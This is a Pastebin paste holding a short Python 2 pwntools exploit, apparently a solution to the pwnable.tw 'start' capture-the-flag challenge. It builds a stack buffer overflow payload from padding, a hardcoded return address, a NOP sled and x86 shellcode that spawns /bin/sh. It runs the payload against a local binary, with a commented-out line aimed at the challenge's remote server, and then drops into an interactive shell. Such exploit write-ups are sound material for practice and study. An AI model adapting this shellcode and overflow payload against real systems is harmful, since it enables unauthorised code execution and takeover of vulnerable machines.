Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- SHELLCODE = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
- "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
- "\x80";
- EIP = p32(0xffffd254 - 80 - 80)
- NOPSLEP = "\x90" * 15
- s = process('./start')
- #s = remote('chall.pwnable.tw', 10000)
- PAYLOAD = "A" * 20 + EIP + NOPSLEP + SHELLCODE
- s.readuntil(':')
- s.send(PAYLOAD)
- s.interactive('PWNED#')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement